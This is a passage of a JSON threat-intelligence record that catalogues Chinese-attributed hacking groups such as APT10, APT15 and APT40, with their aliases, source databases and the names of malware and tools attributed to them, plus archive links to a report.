				"Cloud Hopper",
				"ATK41",
				"Granite Taurus",
				"POTASSIUM"
			],
			"source_name": "MISPGALAXY:APT10",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "1aead86d-0c57-4e3b-b464-a69f6de20cde",
			"created_at": "2023-01-06T13:46:38.318176Z",
			"updated_at": "2026-04-10T02:00:02.925424Z",
			"deleted_at": null,
			"main_name": "DAGGER PANDA",
			"aliases": [
				"UAT-7290",
				"Red Foxtrot",
				"IceFog",
				"RedFoxtrot",
				"Red Wendigo",
				"PLA Unit 69010"
			],
			"source_name": "MISPGALAXY:DAGGER PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "866c0c21-8de3-4ad5-9887-cecd44feb788",
			"created_at": "2022-10-25T16:07:24.130298Z",
			"updated_at": "2026-04-10T02:00:04.875929Z",
			"deleted_at": null,
			"main_name": "Roaming Tiger",
			"aliases": [
				"Bronze Woodland",
				"CTG-7273",
				"Rotten Tomato"
			],
			"source_name": "ETDA:Roaming Tiger",
			"tools": [
				"Agent.dhwf",
				"AngryRebel",
				"BBSRAT",
				"Destroy RAT",
				"DestroyRAT",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"Kaba",
				"Korplug",
				"Moudour",
				"Mydoor",
				"PCRat",
				"PlugX",
				"RedDelta",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Xamtrav"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "0a03e7f0-2f75-4153-9c4f-c46d12d3962e",
			"created_at": "2022-10-25T15:50:23.453824Z",
			"updated_at": "2026-04-10T02:00:05.28793Z",
			"deleted_at": null,
			"main_name": "Ke3chang",
			"aliases": [
				"Ke3chang",
				"APT15",
				"Vixen Panda",
				"GREF",
				"Playful Dragon",
				"RoyalAPT",
				"Nylon Typhoon"
			],
			"source_name": "MITRE:Ke3chang",
			"tools": [
				"Okrum",
				"Systeminfo",
				"netstat",
				"spwebmember",
				"Mimikatz",
				"Tasklist",
				"MirageFox",
				"Neoichor",
				"ipconfig"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "16f2436b-5f84-44e3-a306-f1f9e92f7bea",
			"created_at": "2023-01-06T13:46:38.745572Z",
			"updated_at": "2026-04-10T02:00:03.086207Z",
			"deleted_at": null,
			"main_name": "APT40",
			"aliases": [
				"ATK29",
				"Red Ladon",
				"MUDCARP",
				"ISLANDDREAMS",
				"TEMP.Periscope",
				"KRYPTONITE PANDA",
				"G0065",
				"TA423",
				"ITG09",
				"Gingham Typhoon",
				"TEMP.Jumper",
				"BRONZE MOHAWK",
				"GADOLINIUM"
			],
			"source_name": "MISPGALAXY:APT40",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ba9fa308-a29a-4928-9c06-73aafec7624c",
			"created_at": "2024-05-01T02:03:07.981061Z",
			"updated_at": "2026-04-10T02:00:03.750803Z",
			"deleted_at": null,
			"main_name": "BRONZE RIVERSIDE",
			"aliases": [
				"APT10 ",
				"CTG-5938 ",
				"CVNX ",
				"Hogfish ",
				"MenuPass ",
				"MirrorFace ",
				"POTASSIUM ",
				"Purple Typhoon ",
				"Red Apollo ",
				"Stone Panda "
			],
			"source_name": "Secureworks:BRONZE RIVERSIDE",
			"tools": [
				"ANEL",
				"AsyncRAT",
				"ChChes",
				"Cobalt Strike",
				"HiddenFace",
				"LODEINFO",
				"PlugX",
				"PoisonIvy",
				"QuasarRAT",
				"QuasarRAT Loader",
				"RedLeaves"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7f177406-ec53-4a0e-83b8-9876130c9e73",
			"created_at": "2024-08-28T02:02:09.350152Z",
			"updated_at": "2026-04-10T02:00:04.69275Z",
			"deleted_at": null,
			"main_name": "APT9",
			"aliases": [],
			"source_name": "ETDA:APT9",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "699b7efc-322d-489d-818d-823fac028124",
			"created_at": "2023-01-06T13:46:39.404825Z",
			"updated_at": "2026-04-10T02:00:03.315524Z",
			"deleted_at": null,
			"main_name": "APT9",
			"aliases": [
				"NIGHTSHADE PANDA",
				"Red Pegasus",
				"Group 27"
			],
			"source_name": "MISPGALAXY:APT9",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5d9dfc61-6138-497a-b9da-33885539f19c",
			"created_at": "2022-10-25T16:07:23.720008Z",
			"updated_at": "2026-04-10T02:00:04.726002Z",
			"deleted_at": null,
			"main_name": "Icefog",
			"aliases": [
				"ATK 23",
				"Dagger Panda",
				"Icefog",
				"Red Wendigo"
			],
			"source_name": "ETDA:Icefog",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"Dagger Three",
				"Fucobha",
				"Icefog",
				"Javafog",
				"POISONPLUG.SHADOW",
				"RoyalRoad",
				"ShadowPad Winnti",
				"XShellGhost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "83025f5e-302e-46b0-baf6-650a4d313dfc",
			"created_at": "2024-05-01T02:03:07.971863Z",
			"updated_at": "2026-04-10T02:00:03.743131Z",
			"deleted_at": null,
			"main_name": "BRONZE MOHAWK",
			"aliases": [
				"APT40 ",
				"GADOLINIUM ",
				"Gingham Typhoon ",
				"Kryptonite Panda ",
				"Leviathan ",
				"Nanhaishu ",
				"Pickleworm ",
				"Red Ladon ",
				"TA423 ",
				"Temp.Jumper ",
				"Temp.Periscope "
			],
			"source_name": "Secureworks:BRONZE MOHAWK",
			"tools": [
				"AIRBREAK",
				"BlackCoffee",
				"China Chopper",
				"Cobalt Strike",
				"DadJoke",
				"Donut",
				"FUSIONBLAZE",
				"GreenCrash",
				"Meterpreter",
				"Nanhaishu",
				"Orz",
				"SeDll"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "59be3740-c8c7-47aa-84c8-e80d0cb7ea3a",
			"created_at": "2022-10-25T15:50:23.481057Z",
			"updated_at": "2026-04-10T02:00:05.306469Z",
			"deleted_at": null,
			"main_name": "Leviathan",
			"aliases": [
				"MUDCARP",
				"Kryptonite Panda",
				"Gadolinium",
				"BRONZE MOHAWK",
				"TEMP.Jumper",
				"APT40",
				"TEMP.Periscope",
				"Gingham Typhoon"
			],
			"source_name": "MITRE:Leviathan",
			"tools": [
				"Windows Credential Editor",
				"BITSAdmin",
				"HOMEFRY",
				"Derusbi",
				"at",
				"BLACKCOFFEE",
				"BADFLICK",
				"gh0st RAT",
				"PowerSploit",
				"MURKYTOP",
				"NanHaiShu",
				"Orz",
				"Cobalt Strike",
				"China Chopper"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "ba3fff0c-3ba0-4855-9eeb-1af9ee18136a",
			"created_at": "2022-10-25T15:50:23.298889Z",
			"updated_at": "2026-04-10T02:00:05.316886Z",
			"deleted_at": null,
			"main_name": "menuPass",
			"aliases": [
				"menuPass",
				"POTASSIUM",
				"Stone Panda",
				"APT10",
				"Red Apollo",
				"CVNX",
				"HOGFISH",
				"BRONZE RIVERSIDE"
			],
			"source_name": "MITRE:menuPass",
			"tools": [
				"certutil",
				"FYAnti",
				"UPPERCUT",
				"SNUGRIDE",
				"P8RAT",
				"RedLeaves",
				"SodaMaster",
				"pwdump",
				"Mimikatz",
				"PlugX",
				"PowerSploit",
				"ChChes",
				"cmd",
				"QuasarRAT",
				"AdFind",
				"Cobalt Strike",
				"PoisonIvy",
				"EvilGrab",
				"esentutl",
				"Impacket",
				"Ecipekac",
				"PsExec",
				"HUI Loader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "7d5531e2-0ad1-4237-beed-af009035576f",
			"created_at": "2024-05-01T02:03:07.977868Z",
			"updated_at": "2026-04-10T02:00:03.817883Z",
			"deleted_at": null,
			"main_name": "BRONZE PALACE",
			"aliases": [
				"APT15 ",
				"BRONZE DAVENPORT ",
				"BRONZE IDLEWOOD ",
				"CTG-6119 ",
				"CTG-6119 ",
				"CTG-9246 ",
				"Ke3chang ",
				"NICKEL ",
				"Nylon Typhoon ",
				"Playful Dragon",
				"Vixen Panda "
			],
			"source_name": "Secureworks:BRONZE PALACE",
			"tools": [
				"BMW",
				"BS2005",
				"Enfal",
				"Mirage",
				"RoyalCLI",
				"RoyalDNS"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7c8cf02c-623a-4793-918b-f908675a1aef",
			"created_at": "2023-01-06T13:46:38.309165Z",
			"updated_at": "2026-04-10T02:00:02.921721Z",
			"deleted_at": null,
			"main_name": "APT15",
			"aliases": [
				"Metushy",
				"Lurid",
				"Social Network Team",
				"Royal APT",
				"BRONZE DAVENPORT",
				"BRONZE IDLEWOOD",
				"VIXEN PANDA",
				"Ke3Chang",
				"Playful Dragon",
				"BRONZE PALACE",
				"G0004",
				"Red Vulture",
				"Nylon Typhoon"
			],
			"source_name": "MISPGALAXY:APT15",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5afe7b81-e99a-4c24-8fcc-250fb0cf40a3",
			"created_at": "2023-01-06T13:46:38.324616Z",
			"updated_at": "2026-04-10T02:00:02.928697Z",
			"deleted_at": null,
			"main_name": "Roaming Tiger",
			"aliases": [
				"BRONZE WOODLAND",
				"Rotten Tomato"
			],
			"source_name": "MISPGALAXY:Roaming Tiger",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7d553b83-a7b2-431f-9bc9-08da59f3c4ea",
			"created_at": "2023-01-06T13:46:39.444946Z",
			"updated_at": "2026-04-10T02:00:03.331753Z",
			"deleted_at": null,
			"main_name": "GOBLIN PANDA",
			"aliases": [
				"Conimes",
				"Cycldek"
			],
			"source_name": "MISPGALAXY:GOBLIN PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ee9a20b1-c6d6-42da-909d-66e7699723d1",
			"created_at": "2025-08-07T02:03:24.704306Z",
			"updated_at": "2026-04-10T02:00:03.722506Z",
			"deleted_at": null,
			"main_name": "BRONZE WOODLAND",
			"aliases": [
				"CTG-7273 ",
				"Roaming Tiger ",
				"Rotten Tomato "
			],
			"source_name": "Secureworks:BRONZE WOODLAND",
			"tools": [
				"Appat",
				"BbsRAT",
				"PlugX",
				"Zbot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2c7ecb0e-337c-478f-95d4-7dbe9ba44c39",
			"created_at": "2022-10-25T16:07:23.690871Z",
			"updated_at": "2026-04-10T02:00:04.709966Z",
			"deleted_at": null,
			"main_name": "Goblin Panda",
			"aliases": [
				"1937CN",
				"Conimes",
				"Cycldek",
				"Goblin Panda"
			],
			"source_name": "ETDA:Goblin Panda",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"Agent.dhwf",
				"BackDoor-FBZT!52D84425CDF2",
				"BlueCore",
				"BrowsingHistoryView",
				"ChromePass",
				"CoreLoader",
				"Custom HDoor",
				"Destroy RAT",
				"DestroyRAT",
				"DropPhone",
				"FoundCore",
				"HDoor",
				"HTTPTunnel",
				"JsonCookies",
				"Kaba",
				"Korplug",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"NBTscan",
				"NewCore RAT",
				"PlugX",
				"ProcDump",
				"PsExec",
				"QCRat",
				"RainyDay",
				"RedCore",
				"RedDelta",
				"RoyalRoad",
				"Sisfader",
				"Sisfader RAT",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Trojan.Win32.Staser.ytq",
				"USBCulprit",
				"Win32/Zegost.BW",
				"Xamtrav",
				"ZeGhost",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "17b1b76b-16da-4c4f-8b32-f6fede3eda8c",
			"created_at": "2022-10-25T16:07:23.750796Z",
			"updated_at": "2026-04-10T02:00:04.736762Z",
			"deleted_at": null,
			"main_name": "Ke3chang",
			"aliases": [
				"APT 15",
				"BackdoorDiplomacy",
				"Bronze Davenport",
				"Bronze Idlewood",
				"Bronze Palace",
				"CTG-9246",
				"G0004",
				"G0135",
				"GREF",
				"Ke3chang",
				"Metushy",
				"Nylon Typhoon",
				"Operation Ke3chang",
				"Operation MirageFox",
				"Playful Dragon",
				"Playful Taurus",
				"PurpleHaze",
				"Red Vulture",
				"Royal APT",
				"Social Network Team",
				"Vixen Panda"
			],
			"source_name": "ETDA:Ke3chang",
			"tools": [
				"Agentemis",
				"Anserin",
				"BS2005",
				"BleDoor",
				"CarbonSteal",
				"Cobalt Strike",
				"CobaltStrike",
				"DarthPusher",
				"DoubleAgent",
				"EternalBlue",
				"GoldenEagle",
				"Graphican",
				"HenBox",
				"HighNoon",
				"IRAFAU",
				"Ketrican",
				"Ketrum",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"MS Exchange Tool",
				"Mebroot",
				"Mimikatz",
				"MirageFox",
				"NBTscan",
				"Okrum",
				"PluginPhantom",
				"PortQry",
				"ProcDump",
				"PsList",
				"Quarian",
				"RbDoor",
				"RibDoor",
				"Royal DNS",
				"RoyalCli",
				"RoyalDNS",
				"SAMRID",
				"SMBTouch",
				"SilkBean",
				"Sinowal",
				"SpyWaller",
				"Theola",
				"TidePool",
				"Torpig",
				"Turian",
				"Winnti",
				"XSLCmd",
				"cobeacon",
				"nbtscan",
				"netcat",
				"spwebmember"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434307,
	"ts_updated_at": 1775792274,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/530c04eb6369ec8a5f433e970deaea34b79d0570.pdf",
		"text": "https://archive.orkl.eu/530c04eb6369ec8a5f433e970deaea34b79d0570.txt",
		"img": "https://archive.orkl.eu/530c04eb6369ec8a5f433e970deaea34b79d0570.jpg"
	}
}